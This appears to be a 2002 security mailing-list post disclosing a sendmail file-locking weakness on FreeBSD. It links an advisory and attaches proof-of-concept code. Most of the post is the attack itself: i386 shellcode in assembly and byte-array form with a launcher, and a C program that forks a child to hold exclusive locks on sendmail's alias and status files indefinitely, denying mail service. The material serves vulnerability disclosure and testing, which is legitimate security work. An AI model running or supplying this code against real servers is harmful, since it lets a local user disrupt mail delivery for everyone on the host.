
 
From: KF (dotslashsnosoft.com)
Date: Fri May 24 2002 - 00:48:49 CDT


    A file-locking problem has been identified in sendmail that can be used to
    cause a denial of service (details in the advisory linked below). Attached is
    proof-of-concept code for FreeBSD: a shellcode version and a small C test
    program, both of which take and hold locks on files sendmail needs.

    http://www.sendmail.org/LockingAdvisory.txt

    have a safe Memorial Day folks.

    -KF

    ;
    ; Safemode.org, written by zillion 2002/05/24
    ; http://www.snosoft.com : zillionsnosoft.com
    ; http://www.sendmail.org/LockingAdvisory.txt
    ;
    ; FreeBSD/i386 shellcode (NASM syntax): open("/etc/mail/aliases.db", O_RDONLY),
    ; take an exclusive flock() on the descriptor, then spin so the lock is never
    ; released.  The assembled bytes are the `shellcode[]` array further down.
    ;
    ; FreeBSD syscall convention as used here: arguments are pushed right to left,
    ; one extra dword (the fake return address) is pushed on top, the syscall
    ; number is placed in eax, then `int 0x80`; the result comes back in eax.
    ;

    BITS 32

    jmp short callit            ; jmp/call/pop trick to get the path address into esi

    doit:

    pop esi                     ; esi -> '/etc/mail/aliases.db' (pushed by `call doit`)
    xor eax,eax
    mov [esi + 20],al           ; NUL-terminate the 20-byte path in place (needs writable memory)
    push eax                    ; flags = 0 (O_RDONLY)
    push esi                    ; path
    mov al,5                    ; SYS_open
    push eax                    ; fake return address slot
    int 0x80                    ; eax = fd; no error check

    push byte 0x2               ; LOCK_EX (sign-extended to a dword)
    push eax                    ; fd returned by open()
    mov al,131                  ; SYS_flock; only al is set, so this assumes fd < 256 (upper bytes of eax already 0)
    push eax                    ; fake return address slot
    int 0x80

    ; We're going to stay here forever so the lock is never dropped.  Note the
    ; spin is conditional: `js l00p` jumps to itself only while SF is set, i.e.
    ; when cl-3 came out negative as a signed byte.  Otherwise execution falls
    ; through into `call doit` and the whole open/flock sequence runs again
    ; (leaking one descriptor per pass) until cl has been decremented into the
    ; negative range, after which it spins.

    sub cl,0x3
    l00p:
    js l00p

    callit:
    call doit                   ; pushes the address of the string below and jumps to doit

    db '/etc/mail/aliases.db'   ; 20 bytes; byte 20 is overwritten with NUL above

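    /*

    FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
    Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

    More info: http://www.sendmail.org/LockingAdvisory.txt

    */

    /*
     * Assembled form of the NASM listing above: open("/etc/mail/aliases.db",
     * O_RDONLY) via syscall 5, flock(fd, LOCK_EX) via syscall 131, then spin
     * so the lock is never released.  The path is the last 20 bytes; the
     * code NUL-terminates it at run time by writing into the array's own
     * terminator, so the array must be writable as well as executable.
     */
    char shellcode[] =
            "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
            "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
            "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
            "\x69\x61\x73\x65\x73\x2e\x64\x62";

    /*
     * Launcher: transfers control into shellcode[] by calling it as a
     * function.
     *
     * The earlier version overwrote main's own return address through
     * `(int *)&ret + 2`.  That is undefined behaviour and only works for one
     * exact frame layout (frame pointer kept, no optimisation, 32-bit ints
     * and pointers); a function-pointer call has the same effect without
     * depending on the compiler's stack layout.
     *
     * Either way the bytes must live in an executable mapping.  On a kernel
     * that enforces W^X / NX a plain data array will fault, and the code has
     * to be copied into memory mapped PROT_READ|PROT_WRITE|PROT_EXEC (mmap(2))
     * before being called; that is left out here to keep the PoC header-free.
     *
     * Does not return if the shellcode runs as intended (it spins holding
     * the lock).
     */
    int main()
    {
      void (*run)(void) = (void (*)(void))shellcode;

      run();
      return 0;
    }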

    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/file.h>
    #include <unistd.h>

    /*

    Small test program for the sendmail lock vulnerability on FreeBSD.  It
    forks a child that opens the files below read-only, takes an exclusive
    flock() on each and then stays alive holding them.  Run it, then try
    `sendmail -t` on the same host to observe the effect.

    More info: http://www.sendmail.org/LockingAdvisory.txt

    zillion (at safemode.org && snosoft.com)
    http://www.safemode.org
    http://www.snosoft.com

    */

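    /*
     * Entry point.  Forks; the parent returns immediately and the orphaned
     * child keeps the locks for as long as it lives.
     *
     * Changes from the original: fork() and open() results are checked
     * (an open() failure used to hand -1 to flock(), which silently did
     * nothing), the lock mode is the named constant LOCK_EX instead of
     * 0x02, the child exits with status 1 if it could not take any lock,
     * and it blocks in pause() instead of a busy loop so it does not burn a
     * CPU while waiting.
     *
     * Returns 0 from the parent (or 1 if fork() fails); the child never
     * returns once it holds at least one lock.
     */
    int main() {

      /* Files sendmail locks, per the advisory referenced above.  Opened
         read-only: flock() does not require write access, so any local user
         who can read them can take the lock. */
      static const char *const targets[] = {
        "/etc/mail/aliases",
        "/etc/mail/aliases.db",
        "/var/log/sendmail.st",
      };
      size_t i;
      int held = 0;
      int child = fork();

      if (child < 0) {
        perror("fork");
        return 1;
      }
      if (child != 0) {
        return 0;   /* parent: leave the child behind holding the locks */
      }

      for (i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        int fd = open(targets[i], O_RDONLY);

        if (fd < 0) {
          perror(targets[i]);
          continue;
        }
        if (flock(fd, LOCK_EX) < 0) {
          perror(targets[i]);
          close(fd);
          continue;
        }
        /* fd is deliberately left open: closing it would release the lock. */
        held++;
      }

      if (held == 0) {
        return 1;   /* nothing locked, nothing to hold */
      }

      /* We are here to stay!  pause() only returns after a handled signal,
         so loop around it. */
      for (;;) {
        pause();
      }
    }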